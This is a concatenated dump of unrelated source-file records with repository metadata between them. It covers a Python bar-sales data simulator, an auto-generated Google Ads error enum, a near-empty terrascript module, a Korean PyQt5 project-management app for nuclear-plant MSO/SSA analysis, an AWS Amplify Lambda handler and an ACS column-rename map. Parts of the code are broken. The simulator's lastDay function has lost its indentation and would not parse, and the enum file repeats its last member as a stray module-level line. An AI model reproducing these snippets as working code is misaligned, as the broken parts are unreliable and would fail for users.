        # Fallback JSON serializer (bug fix: was a bare `def _try(o)` that
        # to_JSON's lambda could not resolve — NameError if ever invoked).
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        """Serialize to a compact single-line JSON string."""
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
def generateBeers():
    """Return the bar's fixed menu of Beer objects.

    Fields per beer: id, brand, model, strongness (%), style, color, origin, price.
    """
    beers = [Beer(1, "Kasteel", "Triple", 11, "Belgian Pale Ale", "Blonde", "Belgium", 6),
             Beer(2, "La Raoul", "", 6.5, "Lager", "Blond", "France", 3.6),
             Beer(3, "Rochefort", "8", 9.2, "Abbaye", "Brown", "Belgium", 5.5),
             Beer(4, "Bière du Corbeau", "", 9, "Belgian Pale Ale", "Blond", "Belgium", 5),
             Beer(5, "Cuvée des Trolls", "Blonde", 7, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
             Beer(6, "Orval", "Blonde", 7, "Abbaye", "Amber", "Belgium", 5),
             Beer(7, "Brewdog", "Punk IPA", 5.6, "IPA", "Blond", "Scotland", 4.5),
             Beer(8, "Westmalle", "Triple", 9.5, "Abbaye", "Blond", "Belgium", 5),
             Beer(9, "Rince Cochon", "Blonde", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
             Beer(10, "Hinano", "", 5, "Lager", "Blond", "Polynesia", 4),
             Beer(11, "La Levrette", "Blonde", 5, "Lager", "Blond", "France", 4.5),
             Beer(12, "La Fée Torchette", "Blonde", 6.5, "Lager", "Blond", "France", 4.5),
             Beer(13, "La Trappe", "Quadrupel", 10, "Belgian Pale Ale", "Amber", "Belgium", 5),
             Beer(14, "Kwak", "", 8.4, "Belgian Pale Ale", "Amber", "Belgium", 5.5),
             Beer(15, "Tripel Karmeliet", "", 8.4, "Belgian Pale Ale", "Blond", "Belgium", 5.3),
             Beer(16, "Omnipollo", "Fatamorgana", 8, "IPA", "Amber", "Sweden", 6.5),
             Beer(17, "Barbar", "Miel", 8, "Belgian Pale Ale", "Blond", "Belgium", 6.4),
             Beer(18, "Iron Maiden", "Trooper", 4.7, "Extra Special Bitter", "Blond", "England", 4.6),
             Beer(19, "Gulden", "Draak", 10.7, "Belgian Dark Ale", "Brown", "Belgium", 5.8),
             Beer(20, "Delirium", "Tremens", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 5.4),
             Beer(21, "Chimay", "Bleue", 9, "Belgian Dark Ale", "Brown", "Belgium", 5.4),
             Beer(22, "Angelus", "Blonde", 7, "Belgian Pale Ale", "Blond", "France", 4.8),
             Beer(23, "Pietra", "", 6, "Lager", "Blond", "France", 3.8),
             Beer(24, "Brewdog", "Nanny State", 0.5, "Alcool Free", "Blond", "Scotland", 3.8),
             Beer(25, "La Chouffe", "Blonde", 8, "Belgian Pale Ale", "Blond", "Belgium", 4.6),
             Beer(26, "Blue Moon", "White Ale", 5.4, "White", "White", "USA", 4.5),
             Beer(27, "Rousse du Mont Blanc", "", 6.5, "Amber", "Amber", "France", 3.6),
             Beer(28, "Rochefort", "10", 11.3, "Abbaye", "Brown", "Belgium", 6),
             Beer(29, "Saint Bernardus", "Abt 12", 10, "Belgian Pale Ale", "Brown", "Belgium", 5)
             ]
    return beers
def generateCustomers():
    """Create NB_CUSTOMERS customers with randomised profiles and habits."""
    roster = []
    for idx in range(0, NB_CUSTOMERS):
        full_name = Customer.generateName(idx)
        # NOTE: call order matters for random-stream reproducibility
        joined = Customer.generateFirstDate()
        last_seen = Customer.generateLastDate()
        daily_average = Customer.generateAverageUptakes()
        tastes = Customer.generateHabits()
        wallet = Customer.generateAmount()
        weekday_chances = Customer.generatePonderations()
        roster.append(
            Customer(idx, full_name[0], full_name[1], joined, last_seen,
                     daily_average, tastes, weekday_chances, wallet)
        )
    return roster
def getTempetatureFactor(temperature):
    """Demand multiplier for the day's temperature: cold dampens, heat boosts.

    Returns 0.85 below 5°C, 1 up to 22°C, and 2 - 22/t above (range ~1.04-1.35).
    (Function name typo kept for callers.)
    """
    if temperature < 5:
        return 0.85
    if temperature <= 22:
        return 1
    return 2 - (22 / temperature)
def getHumidityFactor(humidity):
    """Demand multiplier for humidity: dry days boost, very humid days dampen."""
    if humidity < 0.7:
        return 1.2
    return 0.8 if humidity > 0.9 else 1
def willCustomerComeThisDay(customer, weather, singleDateTime):
    """Decide stochastically whether the customer visits the bar on this date."""
    # base chance: the customer's propensity for this weekday
    chance = customer.ponderationDays[singleDateTime.weekday()]
    # modulate by the weather: temperature factor in {0.85, 1, [1.04; 1.35]},
    # humidity factor in {1.2, 1, 0.8}
    chance *= getTempetatureFactor(weather.temperature)
    chance *= getHumidityFactor(weather.humidity)
    # random() is uniform on [0, 1), so this fires with probability `chance`
    return random.random() < chance
def generateUptakesFor1Customer(customer, weather, singleDateTime):
    """Generate the customer's Uptake for one day, or None if they stay home.

    Returns None when the customer skips the bar or has no suitable beer;
    otherwise an Uptake listing the ids of the beers consumed.
    """
    if not willCustomerComeThisDay(customer, weather, singleDateTime):
        return None
    # random number of uptakes around the customer's daily average
    nbUptakes = max(0, customer.averageUptakesPerDay + (-1 + math.ceil(random.random() * 2)))
    # The further we are in the month, the less money the customer has :/
    nbUptakes *= round(math.sin(0.03 * singleDateTime.day + math.pi / 2), 4)  # [1; 0.6]
    nbSuitableBeers = len(customer.suitableBeers)
    if nbSuitableBeers == 0:
        return None
    beers = []
    while nbUptakes > 0:
        # Pick a suitable beer uniformly at random.
        # Bug fix: the original used math.ceil(random.random() * (n - 1)),
        # which (for n > 1) selects index 0 with probability ~0 and skews
        # the draw toward the rest; randrange gives every beer equal chance.
        beer = customer.suitableBeers[random.randrange(nbSuitableBeers)]
        beers.append(beer.id)
        nbUptakes = nbUptakes - 1
    return Uptake(customer.id, beers)
def generateWeather(singleDateTime, averageHumidityPerMonth):
    """Generate a pseudo-random weather condition for the given date."""
    monthly_avg = averageHumidityPerMonth[singleDateTime.month - 1]
    noise = random.random()
    # humidity: monthly average plus up to +0.1 of noise
    humidity = round(monthly_avg + (noise / 10), 2)
    # temperature: drier months get warmer, with some noise
    temperature = math.ceil(-10 + ((1 - monthly_avg) * (50 + 25 * noise)))
    return Weather(temperature, humidity)
def dateRange(start_date, end_date):
    """Yield each date from start_date (inclusive) up to end_date (exclusive)."""
    total_days = int((end_date - start_date).days)
    for offset in range(total_days):
        yield start_date + _td(offset)
def lastDay():
today = _dt.now()
snowCampDay = _dt(2018, 1, 25)
if snowCampDay < today:
return today
return snowCampDay
def generateMonthsHumidity():
    """Pre-compute an average humidity per month (12 values in [0.4, 1.4])."""
    return [math.fabs(math.sin((m - 6) / 12)) + 0.4 for m in range(0, 12)]
def generateData():
    """Build the Bar with customers, beers and a full uptake history.

    Walks every day from the bar's opening to lastDay(); for each day a
    weather condition is generated, and every registered, still-active
    customer may produce an Uptake, recorded both on the day's history and
    on the customer.
    """
    endDay = lastDay()
    customers = generateCustomers()
    beers = generateBeers()
    bar = Bar(beers, customers)
    # pre-compute an average humidity per month to speed-up computation of the weather conditions per day
    averageHumidityPerMonth = generateMonthsHumidity()
    # fill in each day from the opening of the bar with uptakes
    for singleDateTime in dateRange(OPENING_DATE, endDay):
        weather = generateWeather(singleDateTime, averageHumidityPerMonth)
        dailyUptakes = DailyUptakes(weather, singleDateTime)
        for customer in bar.customers:
            # only customers already registered and not yet gone can visit
            if customer.registrationDate <= singleDateTime and customer.lastvisitDate >= singleDateTime:
                uptakes = generateUptakesFor1Customer(customer, weather, singleDateTime)
                if uptakes != None:
                    # record on the day and mirror onto the customer's history
                    dailyUptakes.uptakes.append(uptakes)
                    customerUptakes = CustomerDailyUptakes(singleDateTime, uptakes.beersId)
                    customer.uptakes.append(customerUptakes)
                    bar.nbTotalUptakes += len(uptakes.beersId)
        bar.dailyUptakes.append(dailyUptakes)
    return bar
##############################################################################
# Simulation parameters and script entry point.
NB_CUSTOMERS = 50
OPENING_DATE = _dt(2012, 1, 1)
LAST_DATE = lastDay()
# relative attractiveness of each month (currently unused, kept for reference)
monthPonderations = [7, 8, 8.5, 9, 10, 10, 8.5, 6.5, 10, 10, 10, 6]

""" Start data generation """
bar = generateData()
# dump the whole simulated history as one JSON line
with open('./zenibar_history.json', 'w+') as fu:
    fu.write(bar.to_JSON())
print(bar.nbTotalUptakes)
|
[
"gwennael.buchet@gmail.com"
] |
gwennael.buchet@gmail.com
|
444fd3d4ecdaaf0e9ceab752d1b0931729f02bbe
|
245b92f4140f30e26313bfb3b2e47ed1871a5b83
|
/airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py
|
7a1cbbf42dce80b65a8b1c81159737e23be143fb
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
ephraimbuddy/airflow
|
238d6170a0e4f76456f00423124a260527960710
|
3193857376bc2c8cd2eb133017be1e8cbcaa8405
|
refs/heads/main
| 2023-05-29T05:37:44.992278
| 2023-05-13T19:49:43
| 2023-05-13T19:49:43
| 245,751,695
| 2
| 1
|
Apache-2.0
| 2021-05-20T08:10:14
| 2020-03-08T04:28:27
| null |
UTF-8
|
Python
| false
| false
| 1,509
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="airflow.providers.google_vendor.googleads.v12.errors",
marshal="google.ads.googleads.v12",
manifest={"CampaignFeedErrorEnum",},
)
class CampaignFeedErrorEnum(proto.Message):
    r"""Container for enum describing possible campaign feed errors.
    """

    class CampaignFeedError(proto.Enum):
        r"""Enum describing possible campaign feed errors."""
        # NOTE: auto-generated from the Google Ads v12 proto definitions;
        # do not renumber these values by hand (3 is intentionally absent).
        UNSPECIFIED = 0
        UNKNOWN = 1
        FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
        CANNOT_CREATE_FOR_REMOVED_FEED = 4
        CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
        CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
        INVALID_PLACEHOLDER_TYPE = 7
        MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
        NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
        LEGACY_FEED_TYPE_READ_ONLY = 10
LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"noreply@github.com"
] |
noreply@github.com
|
7f394586d195a86c52647c95b64076218b61bfd6
|
395e06560c7b794a965add40c586684cb0b4e59c
|
/terrascript/ultradns/d.py
|
6fdcb1b3110014abb8abde0673bba426c6116dbf
|
[
"BSD-2-Clause",
"Python-2.0"
] |
permissive
|
alanyee/python-terrascript
|
f01edef3f6e21e5b18bc3295efef1657be17e3ca
|
e880e7650a7c3a88603d5429dafbacd28cd26c7e
|
refs/heads/develop
| 2023-03-09T07:33:32.560816
| 2020-09-21T07:11:09
| 2020-09-21T07:11:09
| 300,696,024
| 0
| 0
|
BSD-2-Clause
| 2021-02-18T00:33:30
| 2020-10-02T17:57:18
| null |
UTF-8
|
Python
| false
| false
| 28
|
py
|
# terrascript/ultradns/d.py
|
[
"ilon.sjogren@enplore.com"
] |
ilon.sjogren@enplore.com
|
deb20b06a842a226505f4352f62729b0865cad89
|
f0463eba4010126fc0574945c2f9b2cd6eb40cff
|
/Component/Windows.py
|
f5c0b35c5e82f1d6668ba09e042bf92cf2805776
|
[] |
no_license
|
Choewonyeong/Standard_Project3
|
b572c3fbf2ac379980b95d7247c867f092b7a09d
|
155903d450c1da7355914c72aa07b8f23a03e336
|
refs/heads/master
| 2022-06-21T18:51:42.766380
| 2020-05-08T00:28:04
| 2020-05-08T00:28:04
| 262,183,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,657
|
py
|
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtWidgets import QWidget, QAction, QMenu, QMenuBar, QLineEdit
from PyQt5.QtWidgets import QDialog, QTableWidget, QTableWidgetItem, QLabel
from PyQt5.QtWidgets import QMessageBox, QComboBox, QTabWidget, QFileDialog
from PyQt5.QtWidgets import QFormLayout, QPushButton, QVBoxLayout, QHBoxLayout
from Component.Shortcut import Shortcut
from Component.Materials import Checkbox
from Component.Materials import CheckboxItem
from Component.Projects.AreaTab import AreaTab
from Component.Projects.CableTab import CableTab
from Component.Projects.EquipTab import EquipTab
from Component.Projects.LogicTap import LogicTab
from Component.Projects.AnalysTab import AnalysTab
from Component.Project import Project
from Excel.Import import Import
from Excel.Export import Export
import shutil
import os
__author__ = "Wonyeong Choe <choewy@stdte.co.kr>"
class Windows(QWidget):
def __init__(self):
QWidget.__init__(self)
self.dirs = ['']+os.listdir('Data')
self.dirs.remove('Origin')
self.db_name = ''
self.__setting__()
self.__component__()
def __setting__(self):
    """Window chrome: title, minimum size, centered + maximized, icon."""
    self.setWindowTitle('원전 MSO, SSA 분석 프로그램')
    self.setMinimumWidth(800)
    self.setMinimumHeight(800)
    self.geometry().center()
    self.showMaximized()
    self.setWindowIcon(QIcon('icon.ico'))
def __component__(self):
    """Assemble the UI parts in order: menu bar, combo box, buttons, tabs, layout."""
    self.__menubar__()
    self.__combobox__()
    self.__pushbutton__()
    self.__tab__()
    self.__layout__()
def __menubar__(self):
    """Create the menu bar: a main menu (about / shortcuts / quit) and a project menu."""
    # --- main menu actions ---
    action_version = QAction('프로그램 정보', self)
    self.action_shortcut = QAction('단축키 정보', self)
    action_exit = QAction('닫기', self)
    action_exit.setShortcut('Ctrl+Q')
    action_version.triggered.connect(self.Version)
    self.action_shortcut.triggered.connect(self.Shortcut)
    action_exit.triggered.connect(self.Exit)
    menu_main = QMenu('메뉴', self)
    menu_main.addAction(action_version)
    menu_main.addAction(self.action_shortcut)
    menu_main.addSeparator()
    menu_main.addAction(action_exit)
    # --- project menu actions (new / manage / refresh) ---
    action_new = QAction('새 프로젝트', self)
    action_new.setShortcut('Ctrl+N')
    action_admin = QAction('프로젝트 관리', self)
    action_admin.setShortcut('Ctrl+M')
    action_refresh = QAction('새로고침', self)
    action_refresh.setShortcut('F5')
    action_new.triggered.connect(self.New)
    action_admin.triggered.connect(self.Admin)
    action_refresh.triggered.connect(self.Refresh)
    menu_project = QMenu('프로젝트', self)
    menu_project.addAction(action_new)
    menu_project.addAction(action_admin)
    menu_project.addAction(action_refresh)
    # --- attach both menus to the bar ---
    self.menubar = QMenuBar(self)
    self.menubar.addMenu(menu_main)
    self.menubar.addMenu(menu_project)
def New(self):
self.lineedit_project = QLineEdit()
self.button_close = QPushButton('닫기')
self.button_create = QPushButton('생성')
self.button_create.setDefault(True)
self.button_close.clicked.connect(self.Close)
self.button_create.clicked.connect(self.Create)
layout_form = QFormLayout()
layout_form.addRow('프로젝트 명', self.lineedit_project)
layout_buttons = QHBoxLayout()
layout_buttons.addWidget(self.button_close)
layout_buttons.addWidget(self.button_create)
layout = QVBoxLayout()
layout.addLayout(layout_form)
layout.addLayout(layout_buttons)
self.dig = QDialog(self)
self.dig.setLayout(layout)
self.dig.setFixedWidth(300)
self.dig.setFixedHeight(100)
self.dig.setWindowTitle('새 프로젝트 생성')
self.dig.exec_()
def __checkbox__(self, table, row, col):
checkboxitem = CheckboxItem()
checkbox = Checkbox(checkboxitem)
checkbox.stateChanged.connect(self.Checked)
table.setItem(row, col, checkboxitem)
table.setCellWidget(row, col, checkbox)
def Checked(self, check):
row = self.table.currentRow()
if check == 2:
self.checked.append(row)
elif check == 0:
self.checked.remove(row)
def Admin(self):
self.checked = []
dirs = ['']+os.listdir('Data')
dirs.remove('Origin')
action_close = QAction('닫기')
action_close.triggered.connect(self.CloseProject)
action_delete = QAction('삭제')
action_delete.setShortcut('Alt+2')
action_delete.triggered.connect(self.DeleteProject)
menubar = QMenuBar()
menubar.addAction(action_close)
menubar.addAction(action_delete)
self.table = QTableWidget()
self.table.setRowCount(0)
self.table.setColumnCount(len(['선택', '프로젝트명']))
self.table.setHorizontalHeaderLabels(['선택', '프로젝트명'])
style = "QTableWidget{color: black;}"
self.table.setStyleSheet(style)
for row, project in enumerate(dirs):
self.table.insertRow(row)
self.table.setRowHeight(row, 50)
self.__checkbox__(self.table, row, 0)
item = QTableWidgetItem(project)
item.setFlags(Qt.ItemIsEditable)
self.table.setItem(row, 1, item)
self.table.resizeColumnsToContents()
self.table.hideRow(0)
self.table.verticalHeader().setVisible(False)
self.table.horizontalHeader().setStretchLastSection(True)
layout = QVBoxLayout()
layout.addWidget(menubar)
layout.addWidget(self.table)
self.dig_project = QDialog(self)
self.dig_project.setLayout(layout)
self.dig_project.setWindowTitle('프로젝트 관리')
self.dig_project.setFixedWidth(400)
self.dig_project.setFixedHeight(800)
self.dig_project.exec_()
def CloseProject(self):
self.dig_project.close()
def DeleteProject(self):
self.checked.sort(reverse=True)
for row in self.checked:
project = self.table.item(row, 1).text()
index = self.dirs.index(project)
current = f"Data/{project}"
shutil.rmtree(current)
self.combobox_project.removeItem(index)
self.dirs.remove(project)
self.table.removeRow(row)
self.checked.clear()
def Refresh(self):
index = self.project.currentIndex()
self.project.clear()
self.project.addTab(AreaTab(self.db_name, self, self.Refresh), '방화지역')
self.project.addTab(EquipTab(self.db_name, self, self.Refresh), '기기')
self.project.addTab(CableTab(self.db_name, self, self.Refresh), '케이블')
self.project.addTab(LogicTab(self.db_name, self, self.Refresh), '논리')
self.project.addTab(AnalysTab(self.db_name, self, self.Refresh), '분석')
self.project.setCurrentIndex(index)
def Version(self):
pixmap = QPixmap('logo.png').scaledToWidth(300)
label_logo = QLabel()
label_logo.setPixmap(pixmap)
label_logo.setAlignment(Qt.AlignCenter)
label_title = QLabel('<h3>원전 MSO, SSA 분석 프로그램 V1.0</h3>')
label_title.setAlignment(Qt.AlignCenter)
layout_head = QVBoxLayout()
layout_head.addWidget(QLabel('소 속 :'))
layout_head.addWidget(QLabel('개 발 자 :'))
layout_head.addWidget(QLabel('제 작 일 :'))
layout_head.addWidget(QLabel('개 요 :'))
layout_head.addWidget(QLabel(''))
layout_content = QVBoxLayout()
layout_content.addWidget(QLabel('(주)스탠더드시험연구소'))
layout_content.addWidget(QLabel('최원영'))
layout_content.addWidget(QLabel('2019-06-10'))
layout_content.addWidget(QLabel('본 프로그램은 (주)스탠더드시험연구소에서 자체적으로 개발한'))
layout_content.addWidget(QLabel('원전 다중오동작(MSO), 안전정지(SSA) 분석을 위한 프로그램입니다.'))
layout_info = QHBoxLayout()
layout_info.addLayout(layout_head)
layout_info.addLayout(layout_content)
layout = QVBoxLayout()
layout.addWidget(label_title)
layout.addWidget(QLabel(''))
layout.addLayout(layout_info)
layout.addWidget(QLabel(''))
layout.addWidget(label_logo)
self.dig_version = QDialog(self)
self.dig_version.setStyleSheet('QDialog{background: white;}')
self.dig_version.setWindowTitle('프로그램 정보')
self.dig_version.setLayout(layout)
self.dig_version.setFixedWidth(460)
self.dig_version.setFixedHeight(280)
self.dig_version.exec_()
def Shortcut(self):
idx = self.tab.count()
self.tab.addTab(Shortcut(), '단축키 정보')
self.tab.setCurrentIndex(idx)
self.action_shortcut.setEnabled(False)
def Exit(self):
self.close()
def Create(self):
db_name = self.lineedit_project.text()
if db_name == '':
QMessageBox.question(self, '오류', '프로젝트 이름을 입력하세요.', QMessageBox.Close)
elif os.path.isdir(f"Data/{db_name}"):
QMessageBox.question(self, '오류', '이미 존재하는 프로젝트입니다.', QMessageBox.Close)
elif db_name != '':
self.dirs.append(db_name)
origin = os.listdir("Data/Origin")
os.makedirs(f"Data/{db_name}")
for index, db in enumerate(origin):
origin_db = f"Data/Origin/{db}"
new_db = f"Data/{db_name}/{db}"
shutil.copy(origin_db, new_db)
self.dig.close()
self.combobox_project.addItems([f'{db_name}'])
def Close(self):
self.dig.close()
def __combobox__(self):
self.combobox_project = QComboBox()
self.combobox_project.addItems(self.dirs)
def __pushbutton__(self):
self.button_project = QPushButton('열기')
self.button_project.clicked.connect(self.Open)
self.button_import = QPushButton('업로드')
self.button_import.clicked.connect(self.Import)
self.button_import.setVisible(False)
self.button_export = QPushButton('다운로드')
self.button_export.clicked.connect(self.Export)
self.button_export.setVisible(False)
def Open(self):
self.db_name = self.combobox_project.currentText()
count = self.tab.count()
tab_bars = []
if count != 0:
for idx in range(count):
text = self.tab.tabText(idx)
tab_bars.append(text)
if self.db_name == '':
self.button_import.setVisible(False)
self.button_export.setVisible(False)
elif self.db_name != '' and self.db_name not in tab_bars:
self.project = Project(self.db_name, self.Refresh)
self.tab.addTab(self.project, self.db_name)
self.tab.setCurrentIndex(self.tab.currentIndex()+1)
self.button_import.setVisible(True)
self.button_export.setVisible(True)
self.button_import.setShortcut('Ctrl+I')
self.button_export.setShortcut('Ctrl+E')
def Import(self):
dig_file = QFileDialog(self)
file_name = dig_file.getOpenFileName(self, caption='엑셀 파일 업로드', directory='', filter='*.xlsx')[0]
if file_name != '':
try:
db_path = f"Data/{self.db_name}"
shutil.rmtree(db_path)
os.makedirs(db_path)
Import(self.db_name, file_name)
self.Refresh()
except:
QMessageBox.question(self, '오류', '업로드에 실패하였습니다.\n엑셀 파일의 양식을 확인하세요.', QMessageBox.Close)
def Export(self):
dig_dirs = QFileDialog(self)
file_path = dig_dirs.getSaveFileName(caption='엑셀 파일 다운로드', directory='', filter='*.xlsx')[0]
if file_path != '':
Export(self.db_name, file_path)
self.Refresh()
self.__success_export__(file_path)
def __success_export__(self, file_path):
label_text = QLabel('다운로드가 완료되었습니다.\n')
label_text.setAlignment(Qt.AlignCenter)
self.file_path = file_path
self.button_ignore = QPushButton('닫기')
self.button_open = QPushButton('열기')
self.button_ignore.clicked.connect(self.Ignore_ExcelFile)
self.button_open.clicked.connect(self.Open_ExcelFile)
layout_button = QHBoxLayout()
layout_button.addWidget(self.button_ignore)
layout_button.addWidget(self.button_open)
layout = QVBoxLayout()
layout.addWidget(label_text)
layout.addLayout(layout_button)
self.dig_export = QDialog(self)
self.dig_export.setLayout(layout)
self.dig_export.setWindowTitle('알림')
style = "QDialog{background-color: white;}"
self.dig_export.setFixedWidth(300)
self.dig_export.setFixedHeight(150)
self.dig_export.setStyleSheet(style)
self.dig_export.show()
def Ignore_ExcelFile(self):
self.dig_export.close()
def Open_ExcelFile(self):
os.system(f"start excel.exe {self.file_path}")
self.dig_export.close()
def __tab__(self):
self.tab = QTabWidget()
self.tab.setMovable(True)
self.tab.setTabsClosable(True)
self.tab.tabCloseRequested.connect(self.CloseTab)
def CloseTab(self, index):
self.tab.removeTab(index)
tab_name = self.tab.tabText(index)
if tab_name == '단축키 정보':
self.action_shortcut.setEnabled(True)
def __layout__(self):
layout_project = QHBoxLayout()
layout_project.addWidget(QLabel(' 프로젝트 선택'))
layout_project.addWidget(self.combobox_project, 5)
layout_project.addWidget(self.button_project, 0)
layout_excelfile = QHBoxLayout()
layout_excelfile.addWidget(QLabel(''), 10)
layout_excelfile.addWidget(self.button_import, 1)
layout_excelfile.addWidget(self.button_export, 1)
layout_top = QHBoxLayout()
layout_top.addLayout(layout_project, 5)
layout_top.addLayout(layout_excelfile, 5)
layout = QVBoxLayout()
layout.addWidget(self.menubar, 0)
layout.addLayout(layout_top, 0)
layout.addWidget(self.tab, 10)
self.setLayout(layout)
|
[
"choewy@stdte.co.kr"
] |
choewy@stdte.co.kr
|
e7d869dd783dc38a75347e17f4554bba94a9bb86
|
78957a573d0554b3476698bb3c9cc07eb17e17d9
|
/amplify/backend/function/awsamplifyauthstarte960f0db4/src/index.py
|
321b1c7bfee9e77e88013a581370dac7b9090996
|
[
"MIT-0"
] |
permissive
|
BearTECH-Consulting-Inc/demo-phc-amplify-auth
|
a500275f94c512dd7b27d32e2c78553770c47181
|
e20a1e503397a3d0fe0f26d93850d5d6c1429775
|
refs/heads/main
| 2023-08-10T21:58:31.380914
| 2021-09-15T03:01:46
| 2021-09-15T03:01:46
| 406,576,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
import json
def handler(event, context):
    """AWS Lambda entry point.

    Logs the incoming event and replies with a fixed greeting plus
    permissive CORS headers.

    Args:
        event: The Lambda invocation payload (any JSON-serializable value).
        context: The Lambda runtime context object (unused).

    Returns:
        A dict in the API-Gateway proxy response shape: status 200,
        CORS headers, and a JSON-encoded greeting string as the body.
    """
    print('received event:')
    print(event)
    cors_headers = {
        'Access-Control-Allow-Headers': '*',
        'Access-Control-Allow-Origin': '*',
        'Access-Control-Allow-Methods': 'OPTIONS,POST,GET',
    }
    response = {
        'statusCode': 200,
        'headers': cors_headers,
        'body': json.dumps('Hello from your new Amplify Python lambda!'),
    }
    return response
|
[
"cameron.hebert@opsguru.io"
] |
cameron.hebert@opsguru.io
|
8dcb937ae42edefdcbf4daffa1f87a7d8005a663
|
66137e154dbe9b9f1d4056dd2cc06daedf2d27fe
|
/acs/acs_ygh_occupied_households_lacking_plumbing/static.py
|
e3c6298668e3537d2584f0f9d02f836b1eb831dd
|
[] |
no_license
|
domsmo/datausa-acs-bamboo-etl
|
edb90504b2418e3ef2c1574cd270a5b54122a1d7
|
07cca23a9003719b1d8bc07c3c417253d68c9ba6
|
refs/heads/main
| 2023-08-31T23:20:56.598074
| 2021-10-23T07:40:14
| 2021-10-23T07:40:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
# Column-rename map applied to the raw Census ACS API output:
# variable codes ending in E are point estimates ('mea-*'), codes ending
# in M are their margins of error ('moe-*').  B25048_002/003 — presumably
# the "complete plumbing" / "lacking plumbing" occupied-household counts
# per the ETL path name; verify against the ACS B25048 table definition.
DICT_RENAME = {
    'B25048_002E': 'mea-0',
    'B25048_003E': 'mea-1',
    'B25048_002M': 'moe-0',
    'B25048_003M': 'moe-1',
}
|
[
"jelmyhermosilla@MacBook-Pro-de-jelmy.local"
] |
jelmyhermosilla@MacBook-Pro-de-jelmy.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.